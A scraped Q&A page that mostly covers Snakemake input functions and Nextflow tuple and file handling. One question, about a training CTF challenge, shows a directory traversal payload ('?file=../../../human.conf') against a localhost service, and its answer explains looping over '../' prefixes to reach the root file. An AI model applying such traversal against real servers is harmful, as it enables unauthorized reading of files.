Snakemake: Generic input function for different file locations - snakemake

I have two locations where my huge data can be stored: /data and /work.
/data is the folder where (intermediate) results are moved to after quality control. It is mounted read-only for the standard user.
/work is the folder where new results are written to. Obviously, it is writable.
I do not want to copy or link data from /data to /work.
So I run my snakemake from within the /work folder and want my input function first to check, if the required file exists in /data (and return the absolute /data path) and if not return the relative path in the /work directory.
def in_func(wildcards):
file_path = apply_wildcards('{id}/{visit}/{id}_{visit}-file_name_1.txt', wildcards)
full_storage_path = os.path.join('/data', file_path)
if os.path.isfile(full_storage_path):
file_path = full_storage_path
return {'myfile': file_path}
rule do_something:
input:
unpack(in_func),
params = '{id}/{visit}/{id}_{visit}_params.txt',
This works fine but I would have to define separate input functions for every rule because the file names differ. Is is possible to write a generic input function that takes as input the file name e.g {id}/{visit}/{id}_{visit}-file_name_1.txt and the wildcards?
I also tried something like
def in_func(file_path):
full_storage_path = os.path.join('/data', file_path)
if os.path.isfile(full_storage_path):
file_path = full_storage_path
file_path
rule do_something:
input:
myfile = in_func('{id}/{visit}/{id}_{visit}-file_name_1.txt')
params = '{id}/{visit}/{id}_{visit}_params.txt',
But then I do not have access to the wildcards in in_func(), do I?
Thanks,
Jan

You could use something like this:
def handle_storage(pattern):
def handle_wildcards(wildcards):
f = pattern.format(**wildcards)
f_data = os.path.join("/data", f)
if os.path.exists(f_data):
return f_data
return f
return handle_wildcards
rule do_something:
input:
myfile = handle_storage('{id}/{visit}/{id}_{visit}-file_name_1.txt')
params = '{id}/{visit}/{id}_{visit}_params.txt',
In other words, the function handle_storage returns a pointer to the handle_wildcards function that is tailored for the particular pattern. The latter is then automatically applied by Snakemake once the wildcard values are known. Inside that function, we first format the pattern and then check if it exists in /data.

Related

Nextflow input how to declare tuple in tuple

I am working with a nextflow workflow that, at a certain stage, groups a series of files by their sample id using groupTuple(), and resulting in a channel that looks like this:
[sample_id, [file_A, file_B, ... , file_N]]
[sample_id, [file_A, file_B, ... , file_N]]
...
[sample_id, [file_A, file_B, ... , file_N]]
Note that this is the same channel structure that you get from .fromFilePairs().
I want to use these channel items in a process in such a way that, for each item, the process reads the sample_id from the first field and all the files from the inner tuple at once.
The nextflow documentation is somewhat cryptic about this, and it is hard to find how to declare this type of input in a channel, so I thought I'd create a question on stack overflow and then answer it myself for anyone who will ever be looking for this answer.
How does one declare the inner tuple in the input section of a nextflow process?
In the example given above, my inner tuple contains items of only one type (files). I can therefore pass the whole second term of the tuple (i.e. the inner tuple) as a single input item under the file() qualifier. Like this:
input:
tuple \
val(sample_id), \
file(inner_tuple) \
from Input_channel
This will ensure that the tuple content is read as file (one by one), the same way as performing .collect() on a channel of files, in the sense that all files will then be available in the nextflow temp directory where the process is executed.
The question is how you come up with sample_id, but in case they just have different file extensions you might use something like this:
all_files = Channel.fromPath("/path/to/your/files/*")
all_files.map { it -> [it.simpleName, it] }
.groupTuple()
.set { grouped_files }
The path qualifier (previously the file qualifier) can be used to stage a single (file) value or a collection of (file) values into the process execution directory. The note at the bottom of the multiple input files section in the docs also mentions:
The normal file input constructs introduced in the input of files
section are valid for collections of multiple files as well.
This means, you can use a script variable, e.g.:
input:
tuple val(sample_id), path(my_files)
In which case, the variable will hold the list of files (preserving the original filenames). You could use it directly to refer to all of the files in the list, or, you could access specific (file) elements (if you need them) using square bracket (slice) notation.
This is the syntax you will want most of the time. However, if you need predicable filenames or if you need to deal with files with the identical filenames, you may need a different approach:
Alternatively, you could specify a target filename, e.g.:
input:
tuple val(sample_id), path('my_file')
In the case where a single file is received by the process, the file would be staged with the target filename. However, when a collection of files is received by the process, the filename will be appended with a numerical suffix representing its ordinal position in the list. For example:
process test {
tag { sample_id }
debug true
stageInMode 'rellink'
input:
tuple val(sample_id), path('fastq')
"""
echo "${sample_id}:"
ls -g --time-style=+"" fastq*
"""
}
workflow {
readgroups = Channel.fromFilePairs( '*_{1,2}.fastq' )
test( readgroups )
}
Results:
$ touch {foo,bar,baz}_{1,2}.fastq
$ nextflow run .
N E X T F L O W ~ version 22.04.4
Launching `./main.nf` [scruffy_caravaggio] DSL2 - revision: 87a80d6d50
executor > local (3)
[65/66f860] process > test (bar) [100%] 3 of 3 ✔
baz:
lrwxrwxrwx 1 users 20 fastq1 -> ../../../baz_1.fastq
lrwxrwxrwx 1 users 20 fastq2 -> ../../../baz_2.fastq
foo:
lrwxrwxrwx 1 users 20 fastq1 -> ../../../foo_1.fastq
lrwxrwxrwx 1 users 20 fastq2 -> ../../../foo_2.fastq
bar:
lrwxrwxrwx 1 users 20 fastq1 -> ../../../bar_1.fastq
lrwxrwxrwx 1 users 20 fastq2 -> ../../../bar_2.fastq
Note that the names of staged files can be controlled using the * and ? wildcards. See the links above for a table that shows how the wildcards are replaced depending on the cardinality of the input collection.

Nextflow: how do you pass an output (multiple files) from the publishdir to the next process?

I have a process generating two files that I am interested in, hitsort.cls and contigs.fasta.
I output these using publishdir:
process RUN_RE {
publishDir "$baseDir/RE_output", mode: 'copy'
input:
file 'interleaved.fq'
output:
file "${params.RE_run}/seqclust/clustering/hitsort.cls"
file "${params.RE_run}/contigs.fasta"
script:
"""
some_code
"""
}
Now, I need these two files to be an input for another process but I don't know how to do that.
I have tried calling this process with
NEXT_PROCESS(params.hitsort, params.contigs)
while specifying the input as:
process NEXT_PROCESS {
input:
path hitsort
path contigs
but it's not working, because only the basename is used instead of the full path. Basically what I want is to wait for RUN_RE to finish, and then use the two files it outputs for the next process.
Best to avoid accessing files in the publishDir, since:
Files are copied into the specified directory in an asynchronous manner, thus they may not be immediately available in the published directory at the end of the process execution. For this reason files published by a process must not be accessed by other downstream processes.
The recommendation is therefore to ensure your processes only access files in the working directory, (i.e. ./work). What this means is: it's best to avoid things like absolute paths in your input and output declarations. This will also help ensure your workflows are portable.
nextflow.enable.dsl=2
params.interleaved_fq = './path/to/interleaved.fq'
params.publish_dir = './results'
process RUN_RE {
publishDir "${params.publish_dir}/RE_output", mode: 'copy'
input:
path interleaved
output:
path "./seqclust/clustering/hitsort.cls", emit: hitsort_cls
path "./contigs.fasta", emit: contigs_fasta
"""
# do something with ${interleaved}...
ls -l "${interleaved}"
# create some outputs...
mkdir -p ./seqclust/clustering
touch ./seqclust/clustering/hitsort.cls
touch ./contigs.fasta
"""
}
process NEXT_PROCESS {
input:
path hitsort
path contigs
"""
ls -l
"""
}
workflow {
interleaved_fq = file( params.interleaved_fq )
NEXT_PROCESS( RUN_RE( interleaved_fq ) )
}
The above workflow block is effectively the same as:
workflow {
interleaved_fq = file( params.interleaved_fq )
RUN_RE( interleaved_fq )
NEXT_PROCESS( RUN_RE.out.hitsort_cls, RUN_RE.out.contigs_fasta )
}

Traverse directory at URL to root in Python

How can you traverse directory to get to root in Python? I wrote some code using BeautifulSoup, but it says 'module not found'. So I have this:
#
# There is a directory traversal vulnerability in the
# following page http://127.0.0.1:8082/humantechconfig?file=human.conf
# Write a script which will attempt various levels of directory
# traversal to find the right amount that will give access
# to the root directory. Inside will be a human.conf with the flag.
#
# Note: The script can timeout if this occurs try narrowing
# down your search
import urllib.request
import os
req = urllib.request.urlopen("http://127.0.0.1:8082/humantechconfig?file=human.conf")
dirName = "/tmp"
def getListOfFiles(dirName):
listOfFile = os.listdir(dirName)
allFiles = list()
for entry in listOfFile:
# Create full path
fullPath = os.path.join(dirName, entry)
if os.path.isdir(fullPath):
allFiles = allFiles + getListOfFiles(fullPath)
else:
allFiles.append(fullPath)
return allFiles
listOfFiles = getListOfFiles(dirName)
print(listOfFiles)
for file in listOfFiles:
if file.endswith(".conf"):
f = open(file, "r")
print(f.read())
This outputs:
/tmp/level-0/level-1/level-2/human.conf
User : Human 66
Flag: Not-Set (Must be Root Human)
However. If I change the URL to 'http://127.0.0.1:8082/humantechconfig?file=../../../human.conf' it gives me the output:
User : Human 66
Flag: Not-Set (Must be Root Human)
User : Root Human
Flag: Well done the flag is: {}
The level of directory traversal it is at fluctuates wildly, from /tmp/level-2 to /tmp/level-15; if it's at the one I wrote, then it says I'm 'Root Human'. But it won't give me the flag, despite the fact that I am suddenly 'Root Human'. Is there something wrong with the way I am traversing directory?
It doesn't seem to matter at all if I take away the req = urllib.request.urlopen("http://127.0.0.1:8082/humantechconfig?file=human.conf") line. How can I actually send the code to that URL?
Thanks!
cyber discovery moon base challenge?
For this one, you need to keep adding '../' in front of human.conf (for example 'http://127.0.0.1:8082/humantechconfig?file=../human.conf') which becomes your URL. This URL you need to request (using urllib.request.urlopen(URL)).
The main bit of the challenge is to attach the ../ multiple times which shall not be very hard using a simple loop. You don't need to use the OS.
Make sure to break the loop once you find the flag (or it will go into an infinite loop and give you errors).

Snakemake variable number of files

I'm in a situation, where I would like to scatter my workflow into a variable number of chunks, which I don't know beforehand. Maybe it is easiest to explain the problem by being concrete:
Someone has handed me FASTQ files demultiplexed using bcl2fastq with the no-lane-splitting option. I would like to split these files according to lane, map each lane individually, and then finally gather everything again. However, I don't know the number of lanes beforehand.
Ideally, I would like a solution like this,
rule split_fastq_file: (...) # results in N FASTQ files
rule map_fastq_file: (...) # do this N times
rule merge_bam_files: (...) # merge the N BAM files
but I am not sure this is possbile. The expand function requires me to know the number of lanes, and can't see how it would be possible to use wildcards for this, either.
I should say that I am rather new to Snakemake, and that I may have complete misunderstood how Snakemake works. It has taken me some time to get used to think about things "upside-down" by focusing on output files and then working backwards.
One option is to use checkpoint when splitting the fastqs, so that you can dynamically re-evaluate the DAG at a later point to get the resulting lanes.
Here's an MWE step by step:
Setup and make an example fastq file.
# Requires Python 3.6+ for f-strings, Snakemake 5.4+ for checkpoints
import pathlib
import random
random.seed(1)
rule make_fastq:
output:
fastq = touch("input/{sample}.fastq")
Create a random number of lanes between 1 and 9 each with random identifier from 1 to 9. Note that we declare this as a checkpoint, rather than a rule, so that we can later access the result. Also, we declare the output here as a directory specific to the sample, so that we can later glob in it to get the lanes that were created.
checkpoint split_fastq:
input:
fastq = rules.make_fastq.output.fastq
output:
lane_dir = directory("temp/split_fastq/{sample}")
run:
pathlib.Path(output.lane_dir).mkdir(exist_ok=True)
n_lanes = random.randrange(1, 10)-
lane_numbers = random.sample(range(1, 10), k = n_lanes)
for lane_number in lane_numbers:
path = pathlib.Path(output.lane_dir) / f"L00{lane_number}.fastq"
path.touch()
Do some intermediate processing.
rule map_fastq:
input:
fastq = "temp/split_fastq/{sample}/L00{lane_number}.fastq"
output:
bam = "temp/map_fastq/{sample}/L00{lane_number}.bam"
run:
bam = pathlib.Path(output.bam)
bam.parent.mkdir(exist_ok=True)
bam.touch()
To merge all the processed files, we use an input function to access the lanes that were created in split_fastq, so that we can do a dynamic expand on these. We do the expand on the last rule in the chain of intermediate processing steps, in this case map_fastq, so that we ask for the correct inputs.
def get_bams(wildcards):
lane_dir = checkpoints.split_fastq.get(**wildcards).output[0]
lane_numbers = glob_wildcards(f"{lane_dir}/L00{{lane_number}}.fastq").lane_number
bams = expand(rules.map_fastq.output.bam, **wildcards, lane_number=lane_numbers)
return bams
This input function now gives us easy access to the bam files we wish to merge, however many there are, and whatever they may be called.
rule merge_bam:
input:
get_bams
output:
bam = "temp/merge_bam/{sample}.bam"
shell:
"cat {input} > {output.bam}"
This example runs, and with random.seed(1) happens to create three lanes (l001, l002, and l005).
If you don't want to use checkpoint, I think you could achieve something similar by creating an input function for merge_bam that opens up the original input fastq, scans the read names for lane info, and predicts what the input files ought to be. This seems less robust, however.

Missing wildcards in S4 snakemake Object in R

I'm running a workflow with a main Snakefile including rules from the rules folder and calling rscripts from those included rules.
Here are a few lines and their specific files:
Snakefile:
samples = pd.read_table("samples.csv", header=0, sep=',', index_col=0)
rule extract:
input:
'summary/umi_expression_matrix.tsv'
include: "rules/extract_expression_single.smk"
rules/extract_expression_single.smk:
rule merge_umi:
input:
expand('summary/{sample}_umi_expression_matrix.tsv', sample=samples.index)
output:
'summary/umi_expression_matrix.tsv'
script:
"../scripts/merge_counts_single.R"
scripts/merge_counts_single.R:
samples = read.csv('samples.csv', header=TRUE, stringsAsFactors=FALSE)$samples
read_list = c()
for (i in 1:length(samples)){
temp_matrix = read.table(snakemake#input[[i]][1], header=T, stringsAsFactors = F)
cell_barcodes = colnames(temp_matrix)[-1]
colnames(temp_matrix) = c("GENE",paste(samples[i], cell_barcodes, sep = "_"))
read_list=c(read_list, list(temp_matrix))
}
# Little function that allows to merge unequal matrices
merge.all <- function(x, y) {
merge(x, y, all=TRUE, by="GENE")
}
read_counts <- Reduce(merge.all, read_list)
read_counts[is.na(read_counts)] = 0
rownames(read_counts) = read_counts[,1]
read_counts = read_counts[,-1]
write.table(read_counts, file=snakemake#output[[1]], sep='\t')
The "clean" way to do it would be to call snakemake#wildcard.sample to attribute sample names to the script. But for some reason snakemake#wildcards is an empty vector.
In python:
print(type(snakemake.wildcards))
print(snakemake.wildcards)
print('done')
gives:
<class 'snakemake.io.Wildcards'>
done
which means it's also empty.
So right now I have to rely on getting back to the samples.csv file and getting the sample names there. I will also have to double check matching indexes maybe using greps, don't want the samples and the files to get mixed up.
Any idea why this is happening?
Update:
I've tried adding the sample_name as params to see if this would work and it actually does.
rule merge_umi:
input:
expand('summary/{sample}_umi_expression_matrix.tsv', sample=samples.index)
params:
sample_name = lambda wildcards: samples.index
output:
'summary/umi_expression_matrix.tsv'
script:
"../scripts/merge_counts_single.R"
I'm gonna use this for now, but my guess is there is still an issue with the scope of wildcards in included rules. Or maybe I'm doing it wrong.
The idea of using wildcards is to call a rule for each value in the wildcards. If you use the expand function in the input of a rule, then your rule will take all of the wildcard values and create a list of strings. Which means, your rule will be invoked just for once (not for each wildcard value). Per default, expand uses the python itertools function product that yields all combinations of the provided wildcard values.
By doing so, you cannot use that wildcard inside your rule any longer. Because when that rule is invoked, it gets all of the wildcard values and convert them into a list that will be given to your R script just for once (not for each wildcard value).
In your case, using wildcards is not suitable, since your merge_count rule will be run only for once (not for each wildcard value).